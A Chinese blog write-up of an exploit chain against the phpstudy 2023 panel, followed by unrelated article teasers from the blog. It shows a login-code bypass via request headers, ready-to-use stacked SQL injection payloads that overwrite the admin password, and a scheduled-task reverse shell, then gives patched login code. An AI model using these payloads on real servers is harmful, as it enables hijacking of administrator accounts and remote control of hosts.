1-随机码绕过

已知某站点使用phpstudy服务器搭建，使用默认端口访问phpstudy后台运维系统页面，返回404 Not Found：

加上user/login也依然如故：

192.168.8.135:9080/user/login

抓包添加一行：

X-Requested-With: XMLHttpRequest

出现了phpstudy的title：

等待一会儿，放行全部数据包后，出现了登录页面，成功绕过了随机码：

Tips：还有一种奇怪的方法绕过随机码：抓包后，在第一行GET和/user/login中间插入两个空格，也可绕过：

2-堆叠注入更改密码

在登录页面，直接构造payload，修改密码为123456或dustfree：

修改密码为123456：

admin';UPDATE ADMINS set PASSWORD = 'c26be8aaf53b15054896983b43eb6a65' where username = 'admin';--

修改密码为dustfree：

admin';UPDATE ADMINS set PASSWORD = 'b43f5ef5f8175aca716d711c8ac8bdd2' where username = 'admin';--

忽略报错，使用dustfree密码登录，用户admin，登录成功：

如果继续返回404 Not Found页面，需要在http头中继续加入 X-Requested-With: XMLHttpRequest才能正常访问。

3-计划任务写入反弹shell

点击左侧的计划任务-->添加任务

新建nc反弹shell：

执行任务-->确定。执行之前服务端开启监听：

4-命令执行

附上account.php修复代码：

<?php

require_once __DIR__.'/../app/lib/common.php';
require_once __DIR__.'/../app/model/Account.php';

$type = post('type');
if(!$type){
	$type = get('type');
}
// 登录
if($type=='login'){
	$username = post('username');
	$pwd = post('password');
	$verifycode = post('verifycode');

	if (strlen($username) > 16) {
		xpexit(json_encode(array('code'=>1,'msg'=>'登录失败，用户名或密码不正确')));
	}

	$username = htmlspecialchars($username);

	$res = Account::login($username,$pwd,$verifycode);
	xpexit(json_encode($res));
}

标签：username,小皮,随机码,--,phpstudy,admin,2023,RCE,login
From： https://www.cnblogs.com/dustfree/p/17458695.html

资源释放发方式二：try-with-resource
......
2023-06-05 hexo 修改默认端口号（2种方案）
前言：我又新建了一个hexo博客，运行时报错，提示4000端口已被占用，下面提供两钟解决方案：1.暂时修改端口号：修改package.json文件里的server，修改前："server":"hexoserver"修改后："server":"hexoserver-p4001"注意：这时候你需要用【npmrunserver】来开启服务。2.永久修改端......
工作日记20230605
要想使零部件在SOLIDWORKSRouting中用为偏心变径管，以下项为可选项。您可以在偏心变径管中生成一个轴(Vertical)来控制变径管在线路子装配体中的角度方位。当您插入变径管时，此竖直轴将与3D草图插入点(连接点)处绘制的第一条构造线对齐。如果偏心大小头没有共线，删除末端自动......
2023-06-05 hexo 分页图标不显示，显示的是【<i class="iconfont icon-arrow-left"></i>
问题描述：如题。注意：我使用的主题为next。解决方案：全局搜索：navclass="pagination"或者找到路径：你的博客\themes\hexo-theme-next\layout\_partials里的【pagination.swig】文件，对其进行修改；修改前：{%ifpage.prevorpage.next%}<navclass="pagination">{{p......
欧奈儿行业 RPS 排名，一图览全貌 2023-06-05 ，继续跟踪总结
自动复盘2023-06-05k线图是最好的老师，点击详情图可以看到行业20日RPS的排名，最底下子图是行业rps走势线跟踪板块总结：成交额超过100亿排名靠前，macd柱由绿转红公众hao:醉卧梦星河欧奈尔行业RPS排名天天更新追踪主力行业趋势更容......
武汉星起航：2023年做亚马逊还有机会吗？简述亚马逊平台的优势
亚马逊作为全球最大的电商平台之一，拥有许多优势，使其在竞争激烈的电商市场中占据重要地位。武汉星起航将介绍亚马逊平台的优势，从多个方面来解析其成功之处。巨大的市场份额和用户规模：亚马逊在全球范围内拥有庞大的市场份额和用户规模。其广泛的市场覆盖和庞大的用户群体为卖家提供了......
装逼大会-2023年电博会&软博会观后感
2023年电博会&软博会于5月17日到19日在青岛会展中心举办，我有幸获得了入场参观的资格，就一大早在展会门口等候，展会一开门我就入场，一直逛到展会闭门。对于我来说，能参观这个展会就如同球迷去世界杯比赛现场观赛一样。我的记忆力不好，不管什么事掉头就忘，是一个丢三落四的半吊子二百五，所以......
固定卡盘行业市场调研分析与未来发展前景报告2023-2029
2023年全球及中国固定卡盘行业头部企业市场占有率及排名调研报告2022年全球固定卡盘市场规模约亿元，2018-2022年年复合增长率CAGR约为%，预计未来将持续保持平稳增长的态势，到2029年市场规模将接近亿元，未来六年CAGR为%。从核心市场看，中国固定卡盘市场占据全球约%的市场份额，为全......
复合水泥助磨剂行业市场调研分析与未来发展前景报告2023-2029
2023-2029全球复合水泥助磨剂行业调研及趋势分析报告2022年全球复合水泥助磨剂市场规模约亿元，2018-2022年年复合增长率CAGR约为%，预计未来将持续保持平稳增长的态势，到2029年市场规模将接近亿元，未来六年CAGR为%。从核心市场看，中国复合水泥助磨剂市场占据全球约%的市场份额，为全......
便携体感游戏机行业市场调研分析与未来发展前景报告2023-2029
2023-2029全球便携体感游戏机行业调研及趋势分析报告2022年全球便携体感游戏机市场规模约亿元，2018-2022年年复合增长率CAGR约为%，预计未来将持续保持平稳增长的态势，到2029年市场规模将接近亿元，未来六年CAGR为%。从核心市场看，中国便携体感游戏机市场占据全球约%的市场份额，为全......

phpstudy小皮面板2023版RCE

1-随机码绕过

2-堆叠注入更改密码

3-计划任务写入反弹shell

4-命令执行

附上account.php修复代码：

相关文章

赞助商

阅读排行